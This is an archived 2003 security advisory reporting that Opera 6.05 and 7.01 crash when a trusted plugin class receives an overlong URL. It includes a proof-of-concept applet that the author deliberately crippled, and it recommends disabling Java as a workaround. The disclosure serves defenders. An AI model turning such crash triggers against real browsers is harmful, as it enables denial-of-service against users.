TUCoPS :: Web :: General :: sb5983.htm

Opera Java-Applet crash
11th Feb 2003 [SBWID-5983]
COMMAND

	Opera Java-Applet crash

SYSTEMS AFFECTED

	Opera 6.05 and 7.01

PROBLEM

	Marc Schoenefeld [schonef@uni-muenster.de] says :
	
	--snip--
	
	Opera has its own class  files  in  the  opera.jar  library.  These  are
	considered trusted by the system policies. But they are also  vulnerable
	against invalid user input. In  the  proof-of-concept  shown  below  the
	following showDocument method of  the  PluginContext  object  is  called
	with a URL object carrying a very long string.  Executing  this  method,
	causes the call of a native method, which cannot handle  the  value  and
	therefore raises a JVM crash, which then crashes Opera  7.01.  This  was
	observed on Windows XP and Opera 6.05/7.01 with Java  enabled,  directly
	calling the applet after installation.
	
	--snap--
	
	//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
	//not runnable, a little crippled, there are couple of obvious syntax errors
	  to avoid script-kidding
	
	..
	import opera.PluginContext; // !! import the vulnerable class
	..
	
	public class OperaCall2 extends App1et
	{
	- -
	- -    public OperaCall2()
	- -    {
	- -    }
	- -
	- -    public void paint(Graphics g)
	- -    {
	- -        PluginContext plugincontext =3D new PluginContext(l);
	- -        try
	- -        {
	- -            plugincontext.showDocument(new URL("http://xxx.xxx" + new
	String(new byte[30000])));
	- -        }
	- -        catch(Exception exception)
	- -        {
	- -            exception.printStackTrace();
	- -        }
	- -    }
	}
	

SOLUTION

	Until a patch becomes available, disable  Java  by  going  to:  File  ->
	Preferences -> Multimedia, and uncheck the "Enable Java" item.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH